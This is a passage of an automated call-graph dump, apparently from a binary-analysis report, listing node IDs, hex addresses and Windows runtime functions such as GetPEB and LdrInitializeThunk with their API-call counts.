calls 18974->18977 18976 15ef99e 64 API calls 18975->18976 18984 15ef959 18976->18984 18978 15ef989 18977->18978 18981 15e03e2 218 API calls 18978->18981 18978->18984 18979 15ef967 18983 15fb640 _vswprintf_s 12 API calls 18979->18983 18980 162bdad 18982 15bad30 GetPEB 18980->18982 18981->18984 18985 162bdb6 18982->18985 18986 15ef97a 18983->18986 18984->18979 18984->18980 18985->18985 18986->18867 18990 1635543 18987->18990 18988 1635612 18989 15fb640 _vswprintf_s 12 API calls 18988->18989 18990->18988 18991 1635767 12 API calls 18990->18991 18993 16355f6 18991->18993 18994 15bb171 _vswprintf_s 12 API calls 18993->18994 18994->18988 18996 167ab79 18995->18996 19005 167ab88 18995->19005 19014 167cac9 18996->19014 18998 167aba4 19020 16828ec 18998->19020 18999 167abb1 19000 167abb6 18999->19000 19001 167abc1 18999->19001 19003 167f9a1 255 API calls 19000->19003 19029 167e539 19001->19029 19006 167ab8f 19003->19006 19005->18998 19005->18999 19005->19006 19006->18389 19008 15d7d50 GetPEB 19007->19008 19009 167134d 19008->19009 19010 1671351 GetPEB 19009->19010 19011 1671361 _vswprintf_s 19009->19011 19010->19011 19012 15fb640 _vswprintf_s 12 API calls 19011->19012 19013 1671384 19012->19013 19013->18397 19015 167cadd 19014->19015 19017 167cafc 19015->19017 19050 167c8f7 19015->19050 19019 167cb00 _vswprintf_s 19017->19019 19054 167d12f 19017->19054 19019->19005 19027 1682908 19020->19027 19022 16829f5 19023 1682a8c 19022->19023 19024 1682a60 19022->19024 19157 16825dd 19023->19157 19026 167a80d 28 API calls 19024->19026 19028 1682a70 _vswprintf_s 19026->19028 19027->19022 19027->19028 19153 1683149 19027->19153 19028->19006 19030 167bbbb 266 API calls 19029->19030 19031 167e567 19030->19031 19035 167e635 19031->19035 19037 167a80d 28 API calls 19031->19037 19038 167e5f6 19031->19038 19049 167e618 19031->19049 19032 167afde 33 API calls 19047 167e804 19032->19047 19033 167a854 33 API calls 19040 167e614 19033->19040 19034 167bcd2 256 API calls 19034->19035 19035->19032 19035->19047 19036 167e68f 19039 167a854 33 API calls 19036->19039 19037->19038 19038->19033 19042 167e6ae 19039->19042 19040->19036 19041 167a80d 28 API calls 19040->19041 19040->19049 19041->19036 19043 15d7d50 GetPEB 19042->19043 19042->19049 19044 167e7a8 19043->19044 19045 167e7c0 19044->19045 19046 167e7ac GetPEB 19044->19046 19045->19047 19048 166fec0 14 API calls 19045->19048 19046->19045 19047->19006 19048->19049 19049->19034 19049->19035 19051 167c915 19050->19051 19052 167c94b 19050->19052 19051->19052 19070 167c43e 19051->19070 19052->19017 19055 167d15d 19054->19055 19056 167d29e 19055->19056 19060 167d2d8 19055->19060 19063 167d2c1 19055->19063 19074 167d616 19055->19074 19080 167d38e 19056->19080 19058 167d2ac 19058->19063 19085 167dbd2 19058->19085 19062 167d38e 13 API calls 19060->19062 19065 167d2e8 19062->19065 19064 167d31c 19063->19064 19094 167c7a2 19063->19094 19067 167d330 19064->19067 19100 167c52d 19064->19100 19065->19063 19069 167dbd2 243 API calls 19065->19069 19067->19019 19069->19063 19071 167c46c _vswprintf_s 19070->19071 19072 15fb640 _vswprintf_s 12 API calls 19071->19072 19073 167c529 19072->19073 19073->19052 19079 167d651 19074->19079 19075 167d757 19076 15fb640 _vswprintf_s 12 API calls 19075->19076 19077 167d85e 19076->19077 19077->19055 19079->19075 19104 167def6 19079->19104 19122 15b774a 19080->19122 19082 167d3d2 19084 167d419 19082->19084 19127 167d466 19082->19127 19084->19058 19087 167dc12 19085->19087 19090 167dd1f 19085->19090 19086 167dcca 19086->19063 19087->19086 19088 167dcb2 19087->19088 19092 167dcd1 19087->19092 19089 167a80d 28 API calls 19088->19089 19089->19086 19090->19086 19091 167c52d 228 API calls 19090->19091 19091->19086 19092->19090 19131 167d8df 19092->19131 19097 167c7c6 _vswprintf_s 19094->19097 19095 15fb640 _vswprintf_s 12 API calls 19096 167c87f 19095->19096 19096->19064 19099 167c863 19097->19099 19137 167c59e 19097->19137 19099->19095 19103 167c548 19100->19103 19101 167c595 19101->19067 19103->19101 19141 167db14 19103->19141 19105 167dfe8 19104->19105 19105->19105 19108 167a6b3 19105->19108 19113 15e1164 19108->19113 19111 15e1164 13 API calls 19112 167a6d7 19111->19112 19112->19075 19114 1625490 19113->19114 19118 15e117f 19113->19118 19116 15f9670 _vswprintf_s LdrInitializeThunk 19114->19116 19116->19118 19119 15e5720 19118->19119 19120 15e4e70 13 API calls 19119->19120 19121 15e1185 19120->19121 19121->19111 19123 15b777a 19122->19123 19124 16128d8 19122->19124 19123->19082 19125 15e1164 13 API calls 19124->19125 19126 16128dd 19125->19126 19128 167d4bc 19127->19128 19129 15fb640 _vswprintf_s 12 API calls 19128->19129 19130 167d591 19129->19130 19130->19084 19134 167d917 19131->19134 19132 15fb640 _vswprintf_s 12 API calls 19133 167da95 19132->19133 19133->19090 19135 167d96d 19134->19135 19136 165da47 228 API calls 19134->19136 19135->19132 19136->19135 19139 167c5c9 19137->19139 19138 15fb640 _vswprintf_s 12 API calls 19140 167c5f9 19138->19140 19139->19138 19140->19099 19142 167db4f 19141->19142 19143 167dbae 19141->19143 19145 15fb640 _vswprintf_s 12 API calls 19142->19145 19147 167c95a 19143->19147 19146 167dbcc 19145->19146 19146->19101 19148 167c99f 19147->19148 19149 167c9e8 19147->19149 19151 15fb640 _vswprintf_s 12 API calls 19148->19151 19150 167d8df 228 API calls 19149->19150 19150->19148 19152 167ca15 19151->19152 19152->19142 19154 1683169 19153->19154 19155 15fb640 _vswprintf_s 12 API calls 19154->19155 19156 16831ce 19155->19156 19156->19027 19158 1682603 19157->19158 19161 16827a5 19158->19161 19163 1682fbd 19158->19163 19159 168286b 19159->19028 19161->19159 19167 168241a 19161->19167 19164 1682fe4 19163->19164 19165 15fb640 _vswprintf_s 12 API calls 19164->19165 19166 16830f0 19165->19166 19166->19161 19168 168242f 19167->19168 19170 168246c 19168->19170 19171 16822ae 19168->19171 19170->19159 19172 16822dd 19171->19172 19173 1682fbd 12 API calls 19172->19173 19174 16823ee 19172->19174 19173->19174 19174->19168 19180 168e667 _vswprintf_s 19175->19180 19176 168e66f 19177 15fb640 _vswprintf_s 12 API calls 19176->19177 19178 168e725 19177->19178 19178->18341 19179 168e704 19179->19176 19181 168e5b6 12 API calls 19179->19181 19180->19176 19180->19179 19189 168e824 19180->19189 19181->19176 19184 168e608 19183->19184 19185 168e5e1 19183->19185 19187 15fb640 _vswprintf_s 12 API calls 19184->19187 19185->19184 19193 168ed52 19185->19193 19188 168e626 19187->19188 19188->18339 19192 168e853 _vswprintf_s 19189->19192 19190 15fb640 _vswprintf_s 12 API calls 19191 168ed3b 19190->19191 19191->19180 19192->19190 19194 168ed73 19193->19194 19195 15fb640 _vswprintf_s 12 API calls 19194->19195 19196 168ee6d 19195->19196 19196->19185 19198 167bbbb 267 API calls 19197->19198 19199 167016d 19198->19199 19199->18345 19200 1670180 19199->19200 19201 167bcd2 256 API calls 19200->19201 19202 1670199 19201->19202 19202->18345 19204 167ae6a 19203->19204 19205 167af3d 19204->19205 19208 167af27 19204->19208 19212 167af38 19204->19212 19206 167afc3 19205->19206 19207 167af6c 19205->19207 19243 167fde2 19206->19243 19221 167ea55 19207->19221 19211 167a80d 28 API calls 19208->19211 19211->19212 19212->18310 19214 15d7d50 GetPEB 19215 167af85 19214->19215 19216 167af99 19215->19216 19217 167af89 GetPEB 19215->19217 19216->19212 19218 167afa3 GetPEB 19216->19218 19217->19216 19218->19212 19219 167afb2 19218->19219 19219->19212 19236 1671608 19219->19236 19222 167ea74 19221->19222 19223 167ea8d 19222->19223 19226 167eab0 19222->19226 19224 167a80d 28 API calls 19223->19224 19225 167af7a 19224->19225 19225->19214 19227 167afde 33 API calls 19226->19227 19228 167eb12 19227->19228 19229 167bcd2 255 API calls 19228->19229 19230 167eb3d 19229->19230 19231 15d7d50 GetPEB 19230->19231 19232 167eb48 19231->19232 19233 167eb60 19232->19233 19234 167eb4c GetPEB 19232->19234 19233->19225 19235 166fe3f 14 API calls 19233->19235 19234->19233 19235->19225 19237 15d7d50 GetPEB 19236->19237 19238 1671634 19237->19238 19239 1671638 GetPEB 19238->19239 19240 1671648 _vswprintf_s 19238->19240 19239->19240 19241 15fb640 _vswprintf_s 12 API calls 19240->19241 19242 167166b 19241->19242 19242->19212 19244 167fdf5 19243->19244 19245 167fe12 19244->19245 19246 167fdfe 19244->19246 19247 167febd 19245->19247 19248 167fe2c 19245->19248 19249 167a80d 28 API calls 19246->19249 19252 1680a13 233 API calls 19247->19252 19250 167fe45 19248->19250 19251 167fe35 19248->19251 19253 167fe0d 19249->19253 19272 1682b28 19250->19272 19254 167dbd2 243 API calls 19251->19254 19256 167fecb 19252->19256 19253->19212 19257 167fe41 19254->19257 19259 15d7d50 GetPEB 19256->19259 19263 15d7d50 GetPEB 19257->19263 19258 167fe55 19258->19257 19264 167c8f7 12 API calls 19258->19264 19260 167fed3 19259->19260 19261 167fee7 19260->19261 19262 167fed7 GetPEB 19260->19262 19261->19253 19266 167fef1 GetPEB 19261->19266 19262->19261 19265 167fe77 19263->19265 19264->19257 19267 167fe8b 19265->19267 19268 167fe7b GetPEB 19265->19268 19266->19253 19271 167fea4 19266->19271 19267->19253 19269 167fe95 GetPEB 19267->19269 19268->19267 19269->19253 19269->19271 19270 1671608 14 API calls 19270->19253 19271->19253 19271->19270 19280 1682b46 19272->19280 19273 1682bbf 19274 167a80d 28 API calls 19273->19274 19277 1682bce 19274->19277 19275 1682c15 19279 167a80d 28 API calls 19275->19279 19276 1682c36 19281 168241a 12 API calls 19276->19281 19277->19258 19278 1682bd3 19278->19275 19278->19276 19279->19277 19280->19273 19280->19278 19282 1682c4a 19281->19282 19282->19277 19284 1683209 19282->19284 19285 1683240 19284->19285 19286 15fb640 _vswprintf_s 12 API calls 19285->19286 19287 168324d 19286->19287 19287->19277 19292 15b9240 19293 15b924c _vswprintf_s 19292->19293 19294 15b925f 19293->19294 19310 15f95d0 LdrInitializeThunk 19293->19310 19311 15b9335 19294->19311 19298 15b9335 LdrInitializeThunk 19299 15b9276 19298->19299 19316 15f95d0 LdrInitializeThunk 19299->19316 19301 15b927e GetPEB 19302 15d77f0 19301->19302 19303 15b929a GetPEB 19302->19303 19304 15d77f0 19303->19304 19305 15b92b6 GetPEB 19304->19305 19307 15b92d2 19305->19307 19306 15b9330 19307->19306 19308 15b9305 GetPEB 19307->19308 19309 15b931f _vswprintf_s 19308->19309 19310->19294 19317 15f95d0 LdrInitializeThunk 19311->19317 19313 15b9342 19318 15f95d0 LdrInitializeThunk 19313->19318 19315 15b926b 19315->19298 19316->19301 19317->19313 19318->19315 18057 15f9540 LdrInitializeThunk 19324 1672d82 19325 1672d8e _vswprintf_s 19324->19325 19328 1672da6 19325->19328 19372 15b40e1 19325->19372 19327 1672f7c 19483 16730c4 19327->19483 19330 160d130 _vswprintf_s 12 API calls 19328->19330 19332 16730c1 19330->19332 19333 1673027 GetPEB 19334 1673032 GetPEB 19333->19334 19335 167304f 19333->19335 19337 15bb150 _vswprintf_s 12 API calls 19334->19337 19338 15bb150 _vswprintf_s 12 API calls 19335->19338 19336 1672e29 19339 1672e38 19336->19339 19341 15ceef0 27 API calls 19336->19341 19340 167304c 19337->19340 19338->19340 19387 1674496 19339->19387 19342 15bb150 _vswprintf_s 12 API calls 19340->19342 19341->19339 19342->19327 19344 1672e53 19451 16749a4 19344->19451 19348 1672eab 19349 1672ecc 19348->19349 19354 15e16c7 LdrInitializeThunk 19348->19354 19350 1672f18 GetPEB 19349->19350 19351 1674496 127 API calls 19349->19351 19352 1672f95 19350->19352 19353 1672f29 19350->19353 19351->19350 19352->19327 19360 1672fd0 GetPEB 19352->19360 19355 1672f2e GetPEB 19353->19355 19356 1672f4b 19353->19356 19354->19349 19357 15bb150 _vswprintf_s 12 API calls 19355->19357 19358 15bb150 _vswprintf_s 12 API calls 19356->19358 19359 1672f48 19357->19359 19358->19359 19361 15bb150 _vswprintf_s 12 API calls 19359->19361 19363 1672fdb GetPEB 19360->19363 19364 1672ff8 19360->19364 19362 1672f69 GetPEB 19361->19362 19362->19327 19366 15bb150 _vswprintf_s 12 API calls 19363->19366 19367 15bb150 _vswprintf_s 12 API calls 19364->19367 19368 1672ff5 19366->19368 19367->19368 19475 165d455 19368->19475 19370 167300e 19371 15bb150 _vswprintf_s 12 API calls 19370->19371 19371->19362 19373 1610423 GetPEB 19372->19373 19374 15b40f7 19372->19374 19375 161044c 19373->19375 19376 161042f GetPEB 19373->19376 19374->19327 19374->19333 19374->19336 19378 15bb150 _vswprintf_s 12 API calls 19375->19378 19377 15bb150 _vswprintf_s 12 API calls 19376->19377 19379 1610449 19377->19379 19378->19379 19380 15bb150 _vswprintf_s 12 API calls 19379->19380 19381 1610462 19380->19381 19382 1610473 19381->19382 19383 15bb150 _vswprintf_s 12 API calls 19381->19383 19384 15bb150 _vswprintf_s 12 API calls 19382->19384 19383->19382 19385 161047f GetPEB 19384->19385 19386 161048c 19385->19386 19388 16749a4 16 API calls 19387->19388 19394 16744b7 19388->19394 19389 16747f2 GetPEB 19390 16747fe 19389->19390 19391 1674738 19390->19391 19555 15e174b 19390->19555 19391->19344 19392 1674564 19405 167459f 19392->19405 19487 15f9660 LdrInitializeThunk 19392->19487 19394->19389 19394->19391 19394->19392 19395 1674697 GetPEB 19394->19395 19397 166fa2b 28 API calls 19394->19397 19398 1674636 GetPEB 19394->19398 19399 16746a3 GetPEB 19395->19399 19400 16746c0 19395->19400 19397->19394 19403 1674642 GetPEB 19398->19403 19404 167465f 19398->19404 19401 15bb150 _vswprintf_s 12 API calls 19399->19401 19402 15bb150 _vswprintf_s 12 API calls 19400->19402 19409 16746bd 19401->19409 19402->19409 19412 15bb150 _vswprintf_s 12 API calls 19403->19412 19414 15bb150 _vswprintf_s 12 API calls 19404->19414 19405->19391 19410 166fa2b 28 API calls 19405->19410 19413 1674759 19405->19413 19488 16623e3 19405->19488 19407 1674830 19411 1674835 GetPEB 19407->19411 19427 1674879 19407->19427 19408 16747aa GetPEB 19415 16747b6 GetPEB 19408->19415 19416 16747d3 19408->19416 19418 15bb150 _vswprintf_s 12 API calls 19409->19418 19410->19405 19420 1674841 GetPEB 19411->19420 19421 167485e 19411->19421 19422 167465c 19412->19422 19424 1674675 19413->19424 19429 1674796 19413->19429 19499 1674aef 19413->19499 19414->19422 19423 15bb150 _vswprintf_s 12 API calls 19415->19423 19417 15bb150 _vswprintf_s 12 API calls 19416->19417 19431 16747d0 19417->19431 19418->19424 19425 15bb150 _vswprintf_s 12 API calls 19420->19425 19426 15bb150 _vswprintf_s 12 API calls 19421->19426 19430 15bb150 _vswprintf_s 12 API calls 19422->19430 19423->19431 19424->19389 19425->19431 19426->19431 19427->19391 19428 16748a8 19427->19428 19435 16748fb GetPEB 19427->19435 19432 16748dc 19428->19432 19438 167494f GetPEB 19428->19438 19429->19407 19429->19408 19430->19424 19434 15bb150 _vswprintf_s 12 API calls 19431->19434 19433 15e174b 13 API calls 19432->19433 19433->19391 19434->19424 19436 1674907 GetPEB 19435->19436 19437 1674924 19435->19437 19439 15bb150 _vswprintf_s 12 API calls 19436->19439 19440 15bb150 _vswprintf_s 12 API calls 19437->19440 19441 167495b GetPEB 19438->19441 19442 1674978 19438->19442 19443 1674921 19439->19443 19440->19443 19444 15bb150 _vswprintf_s 12 API calls 19441->19444 19445 15bb150 _vswprintf_s 12 API calls 19442->19445 19446 15bb150 _vswprintf_s 12 API calls 19443->19446 19447 1674975 19444->19447 19445->19447 19448 1674947 19446->19448 19449 15bb150 _vswprintf_s 12 API calls 19447->19449 19448->19438 19450 167499c 19449->19450 19452 16749bc 19451->19452 19464 1672e6b 19451->19464 19454 16749e4 _vswprintf_s 19452->19454 19996 15f9660 LdrInitializeThunk 19452->19996 19455 1674a21 GetPEB 19454->19455 19454->19464 19456 1674a2d GetPEB 19455->19456 19457 1674a4a 19455->19457 19458 15bb150 _vswprintf_s 12 API calls 19456->19458 19459 15bb150 _vswprintf_s 12 API calls 19457->19459 19460 1674a47 19458->19460 19459->19460 19461 15bb150 _vswprintf_s 12 API calls 19460->19461 19462 1674a6b 19461->19462 19463 1674a9b GetPEB 19462->19463 19462->19464 19465 1674aa7 GetPEB 19463->19465 19466 1674ac4 19463->19466 19464->19327 19464->19348 19471 166fa2b 19464->19471 19467 15bb150 _vswprintf_s 12 API calls 19465->19467 19468 15bb150 _vswprintf_s 12 API calls 19466->19468 19469 1674ac1 19467->19469 19468->19469 19470 15bb150 _vswprintf_s 12 API calls 19469->19470 19470->19464 19472 166fa37 _vswprintf_s 19471->19472 19473 166fcda _vswprintf_s 19472->19473 19474 167a80d 28 API calls 19472->19474 19473->19348 19474->19473 19476 165d4df 19475->19476 19477 165d462 19475->19477 19476->19370 19477->19476 19478 165d493 19477->19478 19479 165d4c5 19477->19479 19997 1633bd3 19478->19997 19481 1633bd3 12 API calls 19479->19481 19482 165d4c0 19481->19482 19482->19370 19484 16730ca 19483->19484 19485 16730d8 19483->19485 19486 15ceb70 33 API calls 19484->19486 19485->19328 19486->19485 19487->19405 19489 16623f9 19488->19489 19498 1662588 19488->19498 19490 1662531 GetPEB 19489->19490 19489->19498 19491 166253e GetPEB 19490->19491 19492 166255c 19490->19492 19493 15bb150 _vswprintf_s 12 API calls 19491->19493 19494 15bb150 _vswprintf_s 12 API calls 19492->19494 19495 1662559 19493->19495 19494->19495 19496 15bb150 _vswprintf_s 12 API calls 19495->19496 19497 1662579 GetPEB 19496->19497 19497->19498 19498->19405 19519 1674b15 19499->19519 19532 1674eb2 19499->19532 19500 16750d5 19505 16750de GetPEB 19500->19505 19522 1674f39 19500->19522 19501 1674ec1 GetPEB 19502 16750b6 19501->19502 19503 1674ed1 GetPEB 19501->19503 19507 15bb150 _vswprintf_s 12 API calls 19502->19507 19506 15bb150 _vswprintf_s 12 API calls 19503->19506 19504 1675045 GetPEB 19508 1675051 GetPEB 19504->19508 19509 167506e 19504->19509 19510 1675107 19505->19510 19511 16750ea GetPEB 19505->19511 19517 1674eeb 19506->19517 19507->19517 19515 15bb150 _vswprintf_s 12 API calls 19508->19515 19512 15bb150 _vswprintf_s 12 API calls 19509->19512 19514 15bb150 _vswprintf_s 12 API calls 19510->19514 19513 15bb150 _vswprintf_s 12 API calls 19511->19513 19516 167506b 19512->19516 19513->19517 19514->19517 19515->19516 19518 15bb150 _vswprintf_s 12 API calls 19516->19518 19520 15bb150 _vswprintf_s 12 API calls 19517->19520 19518->19522 19519->19504 19521 16623e3 15 API calls 19519->19521 19519->19522 19523 1675001 GetPEB 19519->19523 19526 1674ef1 GetPEB 19519->19526 19527 1674f88 19519->19527 19519->19532 19546 1674f41 GetPEB 19519->19546 19549 166fa2b 28 API calls 19519->19549 19550 167a80d 28 API calls 19519->19550 19562 15dbc04 19519->19562 19567 15da229 19519->19567 19614 15da309 19519->19614 19752 15de12c 19519->19752 19756 15de4a0 19519->19756 19520->19522 19521->19519 19522->19413 19524 167500d GetPEB 19523->19524 19525 167502a 19523->19525 19528 15bb150 _vswprintf_s 12 API calls 19524->19528 19531 15bb150 _vswprintf_s 12 API calls 19525->19531 19529 1674efd GetPEB 19526->19529 19530 1674f1a 19526->19530 19527->19522 19537 1674f9e GetPEB 19527->19537 19534 1675027 19528->19534 19535 15bb150 _vswprintf_s 12 API calls 19529->19535 19536 15bb150 _vswprintf_s 12 API calls 19530->19536 19531->19534 19532->19500 19532->19501 19534->19504 19553 1674f17 19535->19553 19536->19553 19539 1674fc7 19537->19539 19540 1674faa GetPEB 19537->19540 19542 15bb150 _vswprintf_s 12 API calls 19539->19542 19541 15bb150 _vswprintf_s 12 API calls 19540->19541 19541->19553 19542->19553 19545 15bb150 _vswprintf_s 12 API calls 19545->19522 19547 1674f4d GetPEB 19546->19547 19548 1674f6a 19546->19548 19551 15bb150 _vswprintf_s 12 API calls 19547->19551 19552 15bb150 _vswprintf_s 12 API calls 19548->19552 19549->19519 19550->19519 19551->19553 19552->19553 19553->19545 19994 15f96e0 LdrInitializeThunk 19555->19994 19557 15e1765 19558 1663c60 13 API calls 19557->19558 19561 15e1773 19557->19561 19559 162562b 19558->19559 19559->19561 19995 15f96e0 LdrInitializeThunk 19559->19995 19561->19391 19563 15dbc24 19562->19563 19564 167a80d 28 API calls 19563->19564 19566 15dbc5f 19563->19566 19565 1622d06 19564->19565 19566->19519 19571 15da249 19567->19571 19568 15da265 19760 15f9660 LdrInitializeThunk 19568->19760 19570 1621c9e 19575 167a80d 28 API calls 19570->19575 19571->19568 19571->19570 19572 15da27e 19573 1621db5 GetPEB 19572->19573 19574 15d7d50 GetPEB 19572->19574 19576 1621dc7 GetPEB 19573->19576 19577 1621de4 19573->19577 19578 15da28d 19574->19578 19579 1621cb0 19575->19579 19580 15bb150 _vswprintf_s 12 API calls 19576->19580 19581 15bb150 _vswprintf_s 12 API calls 19577->19581 19582 15da29a 19578->19582 19583 1621cb8 GetPEB 19578->19583 19579->19519 19584 1621de1 19580->19584 19581->19584 19585 15da2a5 19582->19585 19586 1621ccb GetPEB 19582->19586 19583->19586 19587 15bb150 _vswprintf_s 12 API calls 19584->19587 19588 15d7d50 GetPEB 19585->19588 19586->19585 19589 1621cde 19586->19589 19590 1621e03 19587->19590 19591 15da2ba 19588->19591 19592 167138a 14 API calls 19589->19592 19593 1621cf4 GetPEB 19591->19593 19594 15da2c2 19591->19594 19592->19585 19596 1621d07 GetPEB 19593->19596 19595 15da2cd 19594->19595 19594->19596 19597 15d7d50 GetPEB 19595->19597 19596->19595 19598 1621d1a 19596->19598 19599 15da2d2 19597->19599 19600 15d7d50 GetPEB 19598->19600 19602 15da2df 19599->19602 19603 1621d51 GetPEB 19599->19603 19601 1621d1f 19600->19601 19604 1621d32 19601->19604 19605 1621d23 GetPEB 19601->19605 19607 15d7d50 GetPEB 19602->19607 19610 15da2ea 19602->19610 19603->19602 19761 1671582 19604->19761 19605->19604 19609 1621d69 19607->19609 19608 15da2fb 19608->19519 19611 1621d7c 19609->19611 19612 1621d6d GetPEB 19609->19612 19610->19573 19610->19608 19613 1671582 12 API calls 19611->19613 19612->19611 19613->19610 19615 15da337 19614->19615 19618 15da42d 19614->19618 19615->19618 19671 15da3c6 19615->19671 19765 15d99bf 19615->19765 19616 15da830 32 API calls 19741 15da3bd 19616->19741 19620 15da620 19618->19620 19631 15da440 19618->19631 19623 15da62d 19620->19623 19627 1621e6c GetPEB 19620->19627 19621 15da3f8 19621->19618 19630 15b9373 28 API calls 19621->19630 19622 15da396 19829 15da830 19622->19829 19628 15da65b 19623->19628 19629 1621eca 19623->19629 19624 15da4e5 19634 16220c2 GetPEB 19624->19634 19685 15da4ed 19624->19685 19632 1621e95 19627->19632 19633 1621e78 GetPEB 19627->19633 19636 15e174b 13 API calls 19628->19636 19648 1622240 GetPEB 19629->19648 19629->19671 19630->19618 19631->19624 19631->19629 19643 15e174b 13 API calls 19631->19643 19662 15da4fb 19631->19662 19631->19671 19635 15bb150 _vswprintf_s 12 API calls 19632->19635 19637 15bb150 _vswprintf_s 12 API calls 19633->19637 19639 16220d5 GetPEB 19634->19639 19638 1621e92 19635->19638 19641 15da66e 19636->19641 19637->19638 19644 15bb150 _vswprintf_s 12 API calls 19638->19644 19642 16220ea 19639->19642 19639->19662 19645 15da676 19641->19645 19646 1621ede 19641->19646 19650 16714fb 14 API calls 19642->19650 19651 15da4d8 19643->19651 19652 1621eaa 19644->19652 19653 15d7d50 GetPEB 19645->19653 19661 15db73d 32 API calls 19646->19661 19646->19671 19647 15da594 19858 15db73d 19647->19858 19654 1622269 19648->19654 19655 162224c GetPEB 19648->19655 19650->19662 19651->19646 19659 15da4e0 19651->19659 19652->19623 19668 1672073 28 API calls 19652->19668 19660 15da67b 19653->19660 19658 15bb150 _vswprintf_s 12 API calls 19654->19658 19656 15bb150 _vswprintf_s 12 API calls 19655->19656 19664 1622266 19656->19664 19658->19664 19666 15d7d50 GetPEB 19659->19666 19669 1621f11 GetPEB 19660->19669 19670 15da688 19660->19670 19661->19671 19662->19647 19663 15da55f 19662->19663 19667 1622109 GetPEB 19662->19667 19672 1622162 19663->19672 19679 15da584 19663->19679 19674 15bb150 _vswprintf_s 12 API calls 19664->19674 19665 15da830 32 API calls 19673 15da5c1 19665->19673 19666->19624 19675 1622131 19667->19675 19676 1622114 GetPEB 19667->19676 19668->19623 19677 1621f24 GetPEB 19669->19677 19670->19677 19678 15da693 19670->19678 19671->19616 19682 167a80d 28 API calls 19672->19682 19683 15d7d50 GetPEB 19673->19683 19684 162227e 19674->19684 19687 15bb150 _vswprintf_s 12 API calls 19675->19687 19686 15bb150 _vswprintf_s 12 API calls 19676->19686 19677->19678 19681 1621f37 19677->19681 19882 15b9373 19678->19882 19680 15da830 32 API calls 19679->19680 19680->19647 19689 16714fb 14 API calls 19681->19689 19682->19647 19690 15da5c6 19683->19690 19684->19671 19695 1672073 28 API calls 19684->19695 19685->19639 19685->19662 19691 162212e 19686->19691 19687->19691 19689->19678 19693 16221a0 GetPEB 19690->19693 19694 15da5d3 19690->19694 19696 15bb150 _vswprintf_s 12 API calls 19691->19696 19698 16221b3 GetPEB 19693->19698 19694->19698 19699 15da5de 19694->19699 19695->19671 19700 1622146 19696->19700 19698->19699 19702 16221c8 19698->19702 19701 15d7d50 GetPEB 19699->19701 19700->19663 19703 1672073 28 API calls 19700->19703 19704 15da5e3 19701->19704 19705 15d7d50 GetPEB 19702->19705 19703->19663 19706 1622201 GetPEB 19704->19706 19707 15da5f0 19704->19707 19708 16221cd 19705->19708 19706->19707 19718 15d7d50 GetPEB 19707->19718 19707->19741 19710 16221e0 19708->19710 19711 16221d1 GetPEB 19708->19711 19709 15d7d50 GetPEB 19713 15da787 19709->19713 19714 1671411 12 API calls 19710->19714 19711->19710 19715 15da78f 19713->19715 19716 1621fea GetPEB 19713->19716 19714->19699 19720 1621ffd GetPEB 19715->19720 19748 15da79a 19715->19748 19716->19720 19717 1621f56 GetPEB 19721 1621f61 GetPEB 19717->19721 19722 1621f7e 19717->19722 19723 1622219 19718->19723 19719 15da76d 19725 15da830 32 API calls 19719->19725 19730 1622012 19720->19730 19720->19748 19728 15bb150 _vswprintf_s 12 API calls 19721->19728 19731 15bb150 _vswprintf_s 12 API calls 19722->19731 19723->19629 19729 1622075 19723->19729 19724 1621faf 19726 167a80d 28 API calls 19724->19726 19732 15da77d 19725->19732 19726->19732 19727 15d7d50 GetPEB 19733 15da79f 19727->19733 19734 1621f7b 19728->19734 19738 1671411 12 API calls 19729->19738 19735 15d7d50 GetPEB 19730->19735 19731->19734 19732->19709 19736 1622051 GetPEB 19733->19736 19737 15da7b1 19733->19737 19740 15bb150 _vswprintf_s 12 API calls 19734->19740 19739 1622017 19735->19739 19736->19737 19737->19741 19749 15d7d50 GetPEB 19737->19749 19738->19741 19742 162202a 19739->19742 19743 162201b GetPEB 19739->19743 19744 1621f93 19740->19744 19741->19519 19903 1671411 19742->19903 19743->19742 19746 15da74e 19744->19746 19747 1672073 28 API calls 19744->19747 19746->19719 19746->19724 19747->19746 19748->19727 19750 1622066 19749->19750 19750->19729 19751 162206a GetPEB 19750->19751 19751->19729 19754 15de13b 19752->19754 19753 15dab40 28 API calls 19753->19754 19754->19753 19755 15de153 19754->19755 19755->19519 19757 15de4c0 19756->19757 19758 167a80d 28 API calls 19757->19758 19759 15de4db 19757->19759 19758->19759 19759->19519 19760->19572 19762 16715bd _vswprintf_s 19761->19762 19763 15fb640 _vswprintf_s 12 API calls 19762->19763 19764 1671602 19763->19764 19764->19595 19767 15d99e5 19765->19767 19793 15d99f5 19765->19793 19766 15d9a6e 19768 15d9a7c 19766->19768 19769 1621466 19766->19769 19767->19766 19771 166fa2b 28 API calls 19767->19771 19767->19793 19770 162166a 19768->19770 19781 15d9a9d 19768->19781 19772 162159c 19769->19772 19779 1621487 19769->19779 19774 167a80d 28 API calls 19770->19774 19771->19766 19773 167a80d 28 API calls 19772->19773 19791 15d9b2b 19773->19791 19774->19793 19775 15d9ad7 19782 15da229 39 API calls 19775->19782 19788 15d9ae8 19775->19788 19776 167a80d 28 API calls 19776->19793 19777 16214c0 19780 15da229 39 API calls 19777->19780 19790 16214f2 19777->19790 19778 166fa2b 28 API calls 19778->19793 19779->19777 19787 15dbc04 28 API calls 19779->19787 19784 16214da 19780->19784 19781->19775 19785 15dbc04 28 API calls 19781->19785 19786 15d9b27 19782->19786 19783 15da309 81 API calls 19783->19793 19789 16214de 19784->19789 19784->19790 19785->19775 19786->19788 19786->19791 19787->19777 19788->19793 19795 16215f9 GetPEB 19788->19795 19792 15da309 81 API calls 19789->19792 19790->19791 19796 1621532 GetPEB 19790->19796 19791->19783 19792->19791 19793->19776 19793->19778 19794 15da229 39 API calls 19793->19794 19797 16218a7 19793->19797 19800 15dbc04 28 API calls 19793->19800 19805 15da309 81 API calls 19793->19805 19811 162179e GetPEB 19793->19811 19817 15bb150 _vswprintf_s 12 API calls 19793->19817 19824 15bb150 _vswprintf_s 12 API calls 19793->19824 19828 15d9a3d 19793->19828 19794->19793 19798 1621606 GetPEB 19795->19798 19799 1621624 19795->19799 19801 162153f GetPEB 19796->19801 19802 162155d 19796->19802 19808 16218e7 GetPEB 19797->19808 19797->19828 19803 15bb150 _vswprintf_s 12 API calls 19798->19803 19804 15bb150 _vswprintf_s 12 API calls 19799->19804 19800->19793 19806 15bb150 _vswprintf_s 12 API calls 19801->19806 19807 15bb150 _vswprintf_s 12 API calls 19802->19807 19809 1621621 19803->19809 19804->19809 19805->19793 19810 162155a 19806->19810 19807->19810 19812 1621912 19808->19812 19813 16218f4 GetPEB 19808->19813 19814 15bb150 _vswprintf_s 12 API calls 19809->19814 